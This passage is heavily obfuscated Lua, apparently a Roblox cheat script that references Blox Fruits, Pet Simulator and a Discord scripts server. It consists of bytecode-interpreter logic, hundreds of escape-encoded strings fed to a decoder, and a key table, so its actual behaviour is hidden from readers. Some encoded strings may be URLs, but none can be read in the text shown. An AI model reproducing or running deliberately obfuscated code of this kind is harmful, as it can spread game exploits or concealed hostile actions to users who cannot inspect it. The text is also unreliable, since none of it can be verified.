12)]]=K(P[(b._9pAY)][j[2]],x)Q[D(P[(b._9pAY)][j[2]])]=g[j[1]]end end end elseif(m==(b._VBvZbtfTzJ))then Q[P[(b._9pAY)][j[(#('"dont please"') - 11)]]]=g[j[(#('"cant think of any words anymore"') - 32)]]N(g[j[((function(A) return (#A - 26) end)('"i know your looking at me"'))]](z(args,1,limit-j[1],(F))))Q[P[(b._9pAY)][j[2]]]=g[j[((function(A) return (#A - 21) end)('"bloxfruits vs roblox"'))]]g[j[(#('"dscdotggslashcilberionscripts"') - 30)]]=D(P[(b._9pAY)][j[2]])end end end else if(j[3]>=256)then j[((function(A) return (#A - 20) end)('"please join the discord"'))]=j[3]-256;j[(#('"123"') - 0)]=P[(b._9pAY)][j[5]]end;local a=g;a[j[((function(A) return (#A - 27) end)('"i need huge pets on petsim"'))]]=a[j[2]][j[(#('"cant think of any words anymore"') - 28)]or a[j[3]]]end end end end else d=d-(#('"joindiscordplzs"') - 16)*(P[(b._LcTcKVoZ_drh0)])P[(b._isbbS8)]((function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH)))g[j[(#('"cilberion on top 2"') - 19)]]=Q[D(P[(b._9pAY)][j[((function(A) return (#A - 31) end)('"cant think of any words anymore"'))]])]P[(b._9pAY)][i]=K(v[1],x)if(N(g[j[(#('"joindiscordplzs"') - 16)]])==F)then P[(b._isbbS8)]=(function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH))end;do d=d+1 end end end elseif((b._EhRzdMxeS_h)==m)then local a=j[1]local c=j[((function(A) return (#A - 3) end)('"123"'))]local f=j[3]local g=g;if(f==0)then d=d+1;f=P[(b._LcTcKVoZ_drh0)][d][(b._e6aJMP7OityJxv)]end;local b=(f-((function(A) return (#A - 17) end)('"cilberion on top"')))*50;local d=g[a]if(c==0)then c=e-a end;for c=1,c do d[b+c]=g[a+c]end end else local a=g;j[3]=j[3]or false;if(j[((function(A) return (#A - 4) end)('"haha"'))]>=256)then j[4]=j[2]-256;j[4]=P[(b._9pAY)][j[(#('"bloxfruits vs roblox"') - 18)]]end;j[((function(A) return (#A - 6) end)('"progamer"'))]=j[((function(A) return (#A - 14) end)('"cilberion on top"'))]or false;if(j[3]>=256)then j[(#('"i need huge pets on petsim"') - 23)]=j[3]-256;j[(#('"cant think of any words anymore"') - 28)]=P[(b._9pAY)][j[(#('"i know your looking at me"') - 22)]]end;a[j[((function(A) return (#A - 30) end)('"dscdotggslashcilberionscripts"'))]][j[(#('"cilberion on top 2"') - 16)]or a[j[(#('"joindiscordplzs"') - 15)]]]=j[5]or a[j[3]]end elseif((b._nf_Dve)==m)then g[j[1]]=Q[P[(b._9pAY)][j[((function(A) return (#A - 11) end)('"dont please"'))]]]end elseif(m==(b._QxwGeB))then d=d-((function(A) return (#A - 32) end)('"cant think of any words anymore"'))if(N(g[j[((function(A) return (#A - 30) end)('"dscdotggslashcilberionscripts"'))]])==F)then P[(b._isbbS8)]=(function(a)return a^(b._yLj4GoVKE22Ua5)end)((b._tLjQH))end;do d=d+1 end;g=j[2]%g[j[2]]*j[1]P[(b._9pAY)][i]=K(v[1],x)g[j[1]]=D(P[(b._9pAY)][j[(#('"dscdotggslashcilberionscripts"') - 29)]])d=d-1;for a=g[j[(#('"dscdotggslashcilberionscripts"') - 29)]],g[j[(#('"haha"') - 5)]]do g[j[(#('"please join the discord"') - 22)]]=g[j[3]]..g[P[(b._9pAY)]][a]end end elseif(m==(b._aVtZ_k))then local a=g;local c=j[2]local d=a[c]for b=c+((function(A) return (#A - 24) end)('"please join the discord"')),j[3]do d=d..a[b]end;g[j[1]]=d;g[j[2]]=F;Q[D(P[(b._9pAY)][j[2]])]=g[j[1]]F=o(P[g[j[(#('"dscdotggslashcilberionscripts"') - 30)]]],g[j[((function(A) return (#A - 4) end)('"haha"'))]],g[j[3]])end end;if(d>(V-((function(A) return (#A - 17) end)('"cilberion on top"'))))then break end end end;local a,b=a()if a and(b>0)then return z(a,1,b)end;return end;return J({},d),e end;local c,f=h((b._ENVDJKGD_6jsh),{308,612},0,a())c.xl_19LyLIy(0,(b._9pAY),(b._LcTcKVoZ_drh0),(b._R12vyMm9jSEdqY),0)do local a=c[(b._pYNTfZK0Q3h)]c("\91\94\116\99\123")()c("\88\73\103\102\121\84")()c("\88\68\123")()c("\72\85\116\125")()c("\75\93\117\69\120\81\71\70\62\34")()c("\120\73\116\108\124")()c("\95\82\123\122\122\81\107\80")()c("\11\65\53\76\126\95\120\67\106\107\91\8\127\43\113\118\68\121\84\90\109\45\218\140\152\24\70\2\87\76\67\69\125\47\89\81\123\73\106\116")()c("\102\92\103\100\114\71\126\78\101\97\95\124\105\121\80\122\69\116")()c("\11\95\108\123\114")()c("\94\83\101\110\116\88")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\114\84\64\104\121\74\113\101\72\85\82\113\72\77\67\96\96\113")()c("\103\82\118\110\123\99\98\67\125\103\72")()c("\75\93\117\75\118\71\107\24\36")()c("\116\98\124\97\126\71\81\125")()c("\100\77\116\125\112\97")()c("\95\82\102\123\101\90\96\69")()c("\104\82\96\97\99\65\119")()c("\95\92\119\99\114")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\120\75")()c("\95\82\102\123\101\90\96\69")()c("\79\88\118\125\110\67\122")()c("\92\92\121\99\110\19\103\81\36\101\91\86")()c("\94\83\101\110\116\88")()c("\95\68\101\106")()c("\104\79\112\110\99\90\97\76\36\70\91\91\105")()c("\98\77\83\96\101\94\111\86")()c("\95\82\102\123\101\90\96\69")()c("\101\82\123\106")()c("\77\84\112\99\115\64")()c("\76\127\124\123\100\0\60")()c("\67\73\97\127\100\9\33\13\113\113\95\93\127\37\84\124\68\125\84\77\40\110\87\101\21\78\11\13\113\87\73\69\122\32")()c("\106\79\114\124")()c("\99\120\71\93\67\103\46\100\81\81\121\110\88\68\116\51\24\49\122\121\74")()c("\97\82\124\97\55\116\111\79\97")()c("\89\92\98\104\114\71")()c("\120\88\103\121\114\65")()c("\74\77\101\99\126\80\111\86\109\109\84\0\102\120\73\125")()c("\11\89\116\118\100\83\110\66")()c("\99\88\116\107\114\65\125")()c("\75\93\117\71\96\90\106\24\36")()c("\95\92\119\99\114")()c("\102\88\120\109\114\65\125\74\109\114\110\86\124\110")()c("\75\93\117\70\83\9\46")()c("\125\92\103\104\100")()c("\88\88\97\98\114\71\111\86\101\96\86\74")()c("\100\77\116\125\112\97")()c("\79\92\97\106")()c("\123\82\102\102\99\90\97\76")()c(true)c("\92\92\121\99\110\19\103\81\36\101\91\86")()c("\121\88\114\102\120\93")()c("\101\92\120\106")()c("\123\114\70\91")()c("\106\94\118\96\98\93\122\2\69\101\95")()c("\76\116\123\123")()c("\78\83\118\125\110\67\122")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\127\94\65\113\98\74\99")()c("\21\29")()c("\72\82\123\124\99\82\96\86\119")()c("\110\80\119\106\115\112\97\78\107\112")()c("\125\92\103\104\100")()c("\104\85\96\97\124")()c("\88\88\97\98\114\71\111\86\101\96\86\74")()c("\76\127\124\123\100\5\58")()c("\75\93\117\75\71\19\64\67\105\103\0\15")()c("\74\78\102\106\101\71")()c("\120\68\123\110\103\64\107\2\92\71\84\15\91\66\72\93\79\127\92")()c("\110\83\96\98")()c("\76\127\124\123\100\5\58")()c("\121\82\119\99\120\75\46\114\118\109\92\70\96\110")()c("\95\82\102\123\101\90\96\69")()c("\97\82\119\70\115")()c("\70\88\121\110\121\80\102\77\104\123\26\70\127\43\81\118\79\99\95\11\60\37")()c("\123\82\102\123\118\95\46\97\107\102\95")()c("\88\68\123")()c("\69\88\98")()c("\10\23\97")()c("\95\92\119\99\114")()c("\123\81\116\118\114\65\125")()c("\88\73\103\102\121\84")()c("\76\88\97\98\114\71\111\86\101\96\86\74")()c("\75\93\117\70\71\9\46")()c("\120\68\123\110\103\64\107\2\92\71\84\15\91\66\72\93\79\127\92")()c(false)c("\70\88\121\110\121\80\102\77\104\123\26\70\127\43\81\118\79\99\95\11\60\37")()c("\76\127\124\123\100\5\58")()c("\94\83\101\110\116\88")()c("\125\92\103\104\100")()c("\76\127\124\123\100\0\60")()c("\99\73\97\127\80\86\122")()c("\76\127\124\123\100\11")()c("\125\92\103\104\100")()c("\108\88\97\76\123\90\107\76\112\75\94")()c("\99\74\124\107")()c("\70\88\121\110\121\80\102\77\104\123\26\70\127\43\81\118\79\99\95\11\60\37")()c("\74\78\102\106\101\71")()c("\109\79\124\106\121\87\125\2\71\109\79\65\120")()c("\69\88\98")()c("\123\79\112\98\126\70\99")()c("\120\68\123\110\103\64\107\2\92\71\84\15\91\66\72\93\79\127\92")()c("\97\110\90\65\83\86\109\77\96\103")()c("\70\88\121\110\121\80\102\77\104\123\26\70\127\43\81\118\79\99\95\11\60\37")()c("\71\82\116\107")()c("\94\83\101\110\116\88")()c("\111\84\102\127\123\82\119\2\74\99\87\74")()c("\100\77\116\125\112\97")()c("\75\93\117\76\120\70\96\86\118\123\0\15")()c("\72\82\123\123\114\93\122")()c("\95\82\123\122\122\81\107\80")()c("\111\88\118\96\115\86")()c("\76\92\120\106")()c("\75\93\117\95\120\67\123\78\101\118\83\64\98\49\6")()c("\120\68\123\110\103\64\107\2\92\71\84\15\91\66\72\93\79\127\92")()c("\79\88\118\125\110\67\122")()c("\104\82\96\97\99\65\119\2\84\109\74\90\96\106\82\122\73\127")()c("\95\85\96\98\117\93\111\75\104")()c("\74\78\102\106\101\71")()c("\76\78\96\109")()c("\75\93\117\65\114\71\121\77\118\105\0\15")()c("\111\88\118\96\115\86")()c("\76\110\124\117\114\71")()c("\88\84\111\106\120\85")()c("\104\82\123\123\114\93\122")()c("\89\92\98\104\114\71")()c("\89\92\98\124\114\71")()c("\89\88\100\122\126\65\107")()c("\88\68\123")()c("\76\88\97\98\114\71\111\86\101\96\86\74")()c("\106\79\114\124")()c("\75\93\117\65\118\94\107\24\36")()c("\95\82\102\123\101\90\96\69")()c("\76\88\97\125\118\68\99\71\112\99\78\78\110\103\67")()c("\104\85\116\125\118\80\122\71\118")()c("\118\21\125\123\99\67\125\24\43\45\72\64\110\103\73\107\8\114\84\88\41\106\89\101\95\75\21")()c("\116\98\124\97\126\71\81\125")()c("\10\24\76\34\50\94\35\7\96\86\31\103\54\46\107\41\3\66\97")()c("\92\82\103\100\100\67\111\65\97")()c("\88\68\123")()c("\106\94\118\96\98\93\122\99\99\103")()c("\69\88\98")()c("\11\65\53\76\126\95\120\67\106\107\91\8\127\43\113\118\68\121\84\90\109\45\218\140\152\24\70\2\77\116\12\113\102\125\114\95\125")()c("\76\110\124\117\114\71")()c("\101\92\120\106")()c("\78\83\118\96\115\86")()c("\74\94\118\96\98\93\122\99\99\103")()c("\101\92\120\106")()c("\116\98\124\97\126\71\81\125")()c("\70\88\121\110\121\80\102\77\104\123\26\70\127\43\81\118\79\99\95\11\60\37")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\97\84\70\114\108\84")()c("\120\85\122\125\99\117\97\80\105\99\78")()c("\95\82\123\122\122\81\107\80")()c("\116\98\124\97\100\71\124\125\91")()c("\74\78\102\106\101\71")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\114\82\65\127")()c("\106\81\97\47\86\80\109\77\113\108\78")()c("\95\84\97\99\114")()c("\98\109\53\78\115\87\124\71\119\113")()c("\116\98\124\97\126\71\81\125")()c("\112")()c("\79\78\118\33\112\84\33\65\109\110\88\74\126\98\73\125\85\114\73\92\118\121\75")()c("\101\88\97\120\120\65\101")()c("\76\127\124\123\100\5\58")()c("\76\110\124\117\114\71")()c("\75\93\117\76\126\71\119\24\36")()c("\108\88\97\92\114\65\120\75\103\103")()c("\67\73\97\127\100\9\33\13\98\112\83\74\98\111\85\61\84\126\89\89\105\117\22\107\85\85\21\84\53\11\89\68\108\125\108\17")()c("\125\92\103\104\100")()c("\72\82\121\96\101")()c("\88\73\103\102\121\84")()c("\14\100\56\42\122\30\43\70\36\39\114\21\41\70\28\54\117")()c("\88\88\121\106\116\71")()c("\75\93\117\74\111\86\109\87\112\103\94\15\109\127\28\51")()c("\74\75\116\123\118\65\71\65\107\108\111\93\96")()c("\91\94\116\99\123")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\99\94\82\111\98\86")()c("\95\82\102\123\101\90\96\69")()c("\108\92\120\106\55\101\107\80\119\107\85\65")()c("\89\92\98\124\114\71")()c("\101\92\120\106")()c("\76\88\97\104\114\93\120")()c("\95\82\102\123\101\90\96\69")()c("\95\68\101\106\120\85")()c("\75\93\117\93\114\84\103\77\106\56\26")()c("\89\88\100\122\114\64\122")()c("\126\78\112\125\94\87")()c("\125\92\103\104\100")()c("\111\88\118\96\115\86")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\101\82\88\99\119\87\102\95")()c("\72\85\116\125")()c("\11\65\53\76\126\95\120\67\106\107\91\8\127\43\113\118\68\121\84\90\109\45\218\140\152")()c("\11\82\123\47")()c("\88\88\97\98\114\71\111\86\101\96\86\74")()c("\99\73\97\127\80\86\122")()c("\79\88\118\125\110\67\122")()c({70})c("\120\73\116\108\124")()c("\105\82\113\118")()c("\106\79\114\124")()c("\76\88\97\125\118\68\99\71\112\99\78\78\110\103\67")()c("\4\91\103\102\114\93\106\81\43\97\85\90\98\127")()c("\108\92\120\106\55\127\103\76\111")()c("\77\82\122\123\114\65")()c("\121\95\109\78\121\82\98\91\112\107\89\92\95\110\84\101\79\114\94")()c("\95\68\101\106")()c("\76\127\124\123\100\11")()c("\88\88\97\98\114\71\111\86\101\96\86\74")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\114\78\71\116\104\86\107\67\103\84\67\105\65")()c("\125\92\103\104\100")()c("\68\78")()c("\104\84\97\118")()c("\78\80\119\106\115\64")()c("\79\88\118\125\110\67\122")()c("\75\93\117\91\126\94\107\88\107\108\95\21\44")()c("\75\93\117\125\120\81\98\77\124\56\21\0\105\115\86\118\84\120\94\91\101\104\75\39\73\76\91\80\112\27\92\91\104\108\122\119\109\25")()c("\120\73\116\108\124")()c("\11\95\108\123\114")()c("\98\83\115\96\67\74\126\71")()c("\92\85\124\123\114\95\103\81\112\103\94")()c("\76\110\97\125\126\93\105")()c("\95\84\120\106\100\71\111\79\116")()c("\75\93\117\76\98\65\124\71\106\97\67\21\44")()c("\75\93\117\72\118\94\107\2\82\103\72\92\101\100\72\41\6")()c("\89\92\98\124\114\71")()c("\92\85\124\123\114\95\103\81\112\103\94")()c("\93\92\121\122\114")()c("\109\82\103\98\118\71\125")()c("\125\92\103\104\100")()c("\66\83\121\102\121\86")()c("\118\21\125\123\99\67\125\24\43\45\77\88\123\37\84\124\68\125\84\77\40\110\87\101\21\77\73\71\118\87\3")()c("\75\93\117\95\120\64\122\67\104\34\121\64\104\110\28\51")()c("\75\93\117\78\112\86\52\2")()c("\88\84\111\106\120\85")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\114\84\64\104\121\74\113\101\86\91\79\97")()c("\123\81\116\108\114\101\107\80\119\107\85\65")()c("\74\78\102\106\101\71")()c("\97\110\90\65\82\93\109\77\96\103")()c("\72\79\112\110\99\86\106")()c("\102\92\113\106\85\74\77\75\104\116\91\65\101\106")()c("\95\68\101\106\120\85")()c("\71\88\123")()c("\76\110\124\117\114\71")()c("\71\88\123")()c("\106\78\102\106\99")()c("\102\88\120\109\114\65\125\74\109\114\26\102\98\109\73")()c("\89\92\98\104\114\71")()c("\111\84\102\108\120\65\106\117\97\96\82\64\99\96")()c("\72\82\96\97\99")()c("\94\79\121")()c("\120\68\123\110\103\64\107\2\92\71\84\15\91\66\72\93\79\127\92")()c("\123\81\116\108\114\122\106")()c("\11\65\53")()c("\66\89\112\97\99\90\104\91\97\122\95\76\121\127\73\97")()c("\120\88\97\123\126\93\105\81")()c("\72\82\103\96\98\71\103\76\97")()c("\76\88\97\125\118\68\99\71\112\99\78\78\110\103\67")()c("\89\92\98\124\114\71")()c("\76\92\120\106")()c("\100\77\116\125\112\97")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\114\78\71\116\104\86\107\67")()c("\75\93\117\73\101\90\107\76\96\113\26\108\99\126\72\103\28\49")()c("\95\82\123\122\122\81\107\80")()c("\102\88\97\103\120\87")()c("\110\69\112\108\98\71\97\80")()c("\89\88\100\122\126\65\107")()c("\13\90\116\98\114\122\96\81\112\99\84\76\105\66\66\46")()c("\95\88\109\123")()c("\70\88\121\110\121\80\102\77\104\123\26\70\127\43\81\118\79\99\95\11\60\37")()c("\104\72\103\125\114\93\109\91")()c("\67\73\97\127\72\65\107\83\113\103\73\91")()c("\88\84\111\106\120\85")()c("\120\73\116\108\124")()c("\74\78\102\106\101\71")()c("\88\68\123")()c("\78\83\118\125\110\67\122")()c("\126\78\112\125\55\122\74")()c("\76\127\124\123\100\0\60")()c("\88\73\103\102\121\84")()c("\95\82\102\123\101\90\96\69")()c("\75\93\117")()c("\120\73\116\108\124")()c("\75\93\117\95\101\86\99\75\113\111\0\15")()c("\104\85\96\97\124")()c("\95\84\120\106")()c("\69\92\120\106")()c("\99\72\120\110\121\92\103\70\86\109\85\91\92\106\84\103")()c("\76\88\97\125\118\68\99\71\112\99\78\78\110\103\67")()c("\219\162\129\155\244\176\181\103\124\103\89\90\120\110\66\51\68\104\27")()c("\111\84\102\127\123\82\119\108\101\111\95")()c("\110\69\112\108\98\71\103\77\106\34\110\70\97\110")()c("\99\73\97\127\68\86\124\84\109\97\95")()c("\75\93\117\74\111\86\109\87\112\109\72\21\44")()c("\126\79\121")()c("\104\82\123\123\114\93\122\15\80\123\74\74")()c("\76\80\116\123\116\91")()c("\67\73\97\127\100\9\33\13\109\114\91\95\101\37\69\124\9\114\84\64\104\121\74\113")()c("\76\88\97\98\114\71\111\86\101\96\86\74")()c("\108\88\97\95\101\92\106\87\103\118\115\65\106\100")()c("\88\68\123")()c("\75\93\117\95\120\64\103\86\109\109\84\21\44")()c("\95\68\101\106\120\85")()c("\74\78\102\106\101\71")()c("\2")()c("\95\82\102\123\101\90\96\69")()c("\75\93\117\78\123\71\52\2")()c("\72\82\103\96\98\71\103\76\97")()c("\120\68\123\110\103\64\107\2\92\71\84\15\91\66\72\93\79\127\92")()c("\127\84\120\106\109\92\96\71")()end;do local a={}local function f(f)local g={}local h=1;local j=#f-1;local k=function(a)a=a or 1;local b=o(f,h,h+(a-((function(A) return (#A - 16) end)('"joindiscordplzs"'))))h=h+a;return b end;local l=function()local a,b=e(f,h,h+(#('"dont please"') - 12))h=h+(#('"dscdotggslashcilberionscripts"') - 29)return(b*256)+a end;local l=function()local a,b,c=e(f,h,h+(#('"haha"') - 4))h=h+3;return(c*65536)+(b*256)+a end;local m=function()local a,b,c,d=e(f,h,h+3)h=h+(#('"cant think of any words anymore"') - 29)return(d*16777216)+(c*65536)+(b*256)+a end;local f=function()local a,b,c,d,e=e(f,h,h+(#('"progamer"') - 6))h=h+5;return(d*16777216)+(c*65536)+(b*256)+a+(e*4294967296)end;local d,n,o,p=d(0),d(1),d(2),d(((function(A) return (#A - 7) end)('"progamer"')))local p,q,r=e(n),e(o),e(p)local s=c[(b._a0I7PikOBaw2u)]local l=function()local a,c,f;local g=k()if(g==(b._s44iTGZQ)or g==(b._ff_V1hwi))then return a,c,f else local h=k()if h==d then a=e(k())elseif h==n then a=k()==(b._bAtvGptZLId)end;local e=k()if e==d then local a=(g==(b._Nzt756eDnDHqqz))and l()or m()if(g==(b._luO9wZMW3o))then a=a-131071 end;c=a elseif e==n then c=k()==(b._bAtvGptZLId)end;if(g==(b._Nzt756eDnDHqqz))then local a=k()if a==d then f=l()elseif a==n then f=k()==(b._bAtvGptZLId)end end;return a,c,f end end;while true do local g=k()if g==o then break end;if g==d then local d={}local e=e(k())local e=k(e)local g,h,j=l()d[r]=j;d[q]=h;d[p]=g;d[(b._e6aJMP7OityJxv)]=f()c(e)(d)local b=m()a[b]=e end;if g==n then local d={}local e=e(k())local a=a[e]local e,g,h=l()d[r]=h;d[q]=g;d[(b._e6aJMP7OityJxv)]=f()d[p]=e;c(a)(d)end;if h>j then break end end;for b,c in H(a)do a[b]=nil end;a=nil;return g end;f(F)end;do local a=c[(b._FQBbdY_saMj)]end;return f(a())end)({[-185.9008824198471]="Ezygwqw_lkSshqv8BP799Mbn";[210.6989024088117]="9w2FEreRSdSauhO";["mCLEIWhFF"]="P4txLRIZv";["CTtk_73O5fD9b"]="qDaw1LKl_5WIBB_6YzG6E";[-79.63822929792886]="icuLniA3W_C";[-219.80409852519608]="Wp2Z5qC9XXfAkd1V";[(#('"cilberion on top"') - 17)]=a();["IobOaWPXHrHA5Z"]="KYRDnogM3mx";[-178.6851331704202]="bPdA9fd6DBVNLpFtyf_T4cN";[10.648352482408132]="OdTbXfC5jfF2Juzpz8rcqOeYTu";[389.47261241250027]="llbu1BupVGOLOcPXqpi";[108.18933422456118]="Yct249D5GU7YzfoS6PM3";[-278.17065390050817]="ko8_wJEsbfPoNL_";["fW"]="OkKzY8QH";["n9Xn5H4Ia2JSVaaK1iLhJMmK1QKkW"]="IPWySgMWfQkpUp9hmEmy";[65.99595047555522]="GSAd1Lfo";["QcaQbym1u4HivfJrx"]="fen3x6o0lJgqgZCtcq";[10.460976045280415]="uC69eUH9xWBnfQU";[172.63999690357008]="3rHASfyHkd8kbvDG2r50a5_";[-188.3423791976178]="FTEaTysGIyi";["o_Sn6GxYVOfhrs5kX0q2ibjkk"]="LQK2N8XheOSzhHk8001QBNFb";[-109.79417797072705]="jYPc_mHJMdaDRP34IeAjQvd";[359.41963869527325]="hln4wXuhG3oBgasFzU";[157.9911592108393]="GoUUovfXA";["cA_J8b"]="e9v7tbWWyC";["kGcmc15qxn3NnYSDqGJmW5W1"]="cbgG2RkveQhhdvV3";[-181.43890913509316]="oDAMf_3_aGatz9Ol77eEU";[249.20426330157625]="GMmLkbqDS";[-166.38028242751136]="uUTEncwBiI8gfwQo";[-139.03430547432862]="H8PgFZV9AKGmBU";["Opnyg61"]="TCshgiQ4LKvw2a_";[92.66339618368707]="KySkwkWKGvwU7e8P8kaOD";["ceES31mwN3NjIcd6gAL"]="loZSWcUzTE1";[-268.18440029647525]="qIZEiYe8dWM_qZ1o9lNSBn1";["ioPJJTBZx"]="nHKHktXqq3BlaBAOwX4Tv1Z4";[-115.30164972677093]="hyOpasokWopP7ow";[2]=c;[365.2430316691025]="j3qtvCX8";[234.58975949428844]="qcmsXc1aHETbDUnZuU7qwO";["Bf27DcBrA5znbqxLMOIPak"]="5Q44fsh6ZhUhTeUML";[-228.74845727057826]="tpkrNK8qQSAhZF"})
